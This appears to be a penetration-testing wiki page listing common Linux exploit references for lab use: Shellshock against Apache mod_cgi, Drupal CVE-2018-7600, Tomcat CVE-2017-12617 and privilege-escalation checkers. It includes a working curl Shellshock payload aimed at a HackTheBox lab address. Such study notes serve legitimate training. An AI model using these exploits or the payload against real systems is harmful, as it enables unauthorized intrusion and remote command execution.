Common Linux exploits
lethanhtung01011980 edited this page Apr 23, 2020 · 8 revisions
- To gain access: Search ExploitDB for "Apache remote"
- To get root: Search ExploitDB for "Apache escalation"
Webmin RCE:
Apache mod_cgi (Shellshock RCE):
- https://exploit-db.com/exploits/34900/
- Ref: https://marcelowoloszyn.cl/hackthebox/hack-the-box-write-up-shocker/
- MSF: https://www.rapid7.com/db/modules/exploit/multi/http/apache_mod_cgi_bash_env_exec
```
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'whoami'" http://10.10.10.56/cgi-bin/user.sh
```
Drupal-RCE
- CVE-2018-7600-Drupal-RCE: https://github.com/lethanhtung01011980/CVE-2018-7600-Drupal-RCE
Tomcat RCE
- CVE-2017-12617: https://www.exploit-db.com/exploits/42966
- LinEnum & Linux Priv Checker: https://github.com/lethanhtung01011980/Notes/wiki/LinuxPriChecker